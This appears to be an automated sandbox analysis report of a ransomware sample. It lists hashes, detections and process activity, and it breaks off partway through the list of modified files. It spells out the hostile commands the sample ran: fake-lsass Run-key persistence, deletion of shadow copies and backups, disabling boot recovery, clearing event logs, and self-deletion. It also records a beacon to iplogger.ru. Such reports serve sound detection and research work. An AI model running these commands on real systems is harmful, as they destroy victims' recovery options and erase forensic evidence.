- * ID: 2303
- * MalFamily: "Malicious"
- * MalScore: 10.0
- * File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
- * File Size: 435200
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
- * MD5: "636d3c669e36510bf337fd2f1ea64732"
- * SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
- * SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
- * CRC32: "D4F2AC3B"
- * SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
- * Process Execution:
- "nH3pXIYjPPePo.exe",
- "cmd.exe",
- "reg.exe",
- "lsass.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "WMIC.exe",
- "cmd.exe",
- "vssadmin.exe",
- "cmd.exe",
- "reg.exe",
- "cmd.exe",
- "reg.exe",
- "cmd.exe",
- "reg.exe",
- "cmd.exe",
- "attrib.exe",
- "cmd.exe",
- "cmd.exe",
- "wevtutil.exe",
- "cmd.exe",
- "wevtutil.exe",
- "cmd.exe",
- "wevtutil.exe",
- "cmd.exe",
- "sc.exe",
- "lsass.exe",
- "lsass.exe",
- "cmd.exe",
- "PING.EXE",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "VSSVC.exe",
- "taskhost.exe",
- "WMIADAP.exe"
- * Executed Commands:
- "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
- "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
- "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
- "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
- "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
- "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
- "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
- "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
- "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
- "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
- "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
- "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
- "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
- "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
- "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
- "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
- "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
- "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
- "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\vssvc.exe",
- "vssadmin delete shadows /all /quiet",
- "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
- "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
- "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
- "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
- "wevtutil.exe clear-log Application",
- "wevtutil.exe clear-log Security",
- "wevtutil.exe clear-log System",
- "sc config eventlog start=disabled"
- * Signatures Detected:
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "nH3pXIYjPPePo.exe, PID 2244"
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "nH3pXIYjPPePo.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "Executed a command line with /V argument which modifies variable behaviour and whitespace allowing for increased obfuscation options",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
- "Description": "A ping command was executed with the -n argument possibly to delay analysis",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
- "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
- "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
- "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
- "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
- "command": "sc config eventlog start=disabled"
- "Description": "Attempts to delete volume shadow copies",
- "Details":
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 126917 times"
- "Description": "Modifies boot configuration settings",
- "Details":
- "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
- "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
- "Description": "A system process is generating network traffic likely as a result of process injection",
- "Details":
- "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
- "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
- "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
- "Description": "Writes a potential ransom message to disk",
- "Details":
- "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
- "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
- "Details":
- "Cylance": "Unsafe"
- "CrowdStrike": "win/malicious_confidence_100% (D)"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Endgame": "malicious (high confidence)"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
- "FireEye": "Generic.mg.636d3c669e36510b"
- "SentinelOne": "DFI - Malicious PE"
- "Microsoft": "Trojan:Win32/Suloc.A"
- "Acronis": "suspicious"
- "VBA32": "Malware-Cryptor.General.3"
- "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
- "Cybereason": "malicious.5d1a74"
- "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
- "Description": "Detects VirtualBox through the presence of a file",
- "Details":
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
- "Description": "Clears Windows events or logs",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
- "command": "wevtutil.exe clear-log Application"
- "command": "wevtutil.exe clear-log Security"
- "command": "wevtutil.exe clear-log System"
- "Description": "Appears to use character obfuscation in a command line",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "Description": "Creates a copy of itself",
- "Details":
- "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
- "Description": "Anomalous binary characteristics",
- "Details":
- "anomaly": "Found duplicated section names"
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
- "command": "vssadmin delete shadows /all /quiet"
- "command": "wevtutil.exe clear-log Application"
- "command": "wevtutil.exe clear-log Security"
- "command": "wevtutil.exe clear-log System"
- * Started Service:
- * Mutexes:
- "Global\\ADAP_WMI_ENTRY",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex_Flag"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
- "\\??\\PIPE\\wkssvc",
- "\\Device\\LanmanDatagramReceiver",
- "\\??\\PIPE\\DAV RPC SERVICE",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "\\??\\PIPE\\samr",
- "C:\\.doc",
- "C:\\.doc.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
- "C:\\.htm",
- "C:\\.htm.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.jpeg",
- "C:\\.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.jpg",
- "C:\\.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.pptx",
- "C:\\.pptx.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.txt",
- "C:\\.txt.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.xls",
- "C:\\.xls.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.zip",
- "C:\\2960.ini",
- "C:\\Host.bmp",
- "C:\\Host.bmp.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.docx",
- "C:\\Host.docx.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.html",
- "C:\\Host.html.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.jpeg",
- "C:\\Host.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.jpg",
- "C:\\Host.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.pdf",
- "C:\\Host.pdf.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
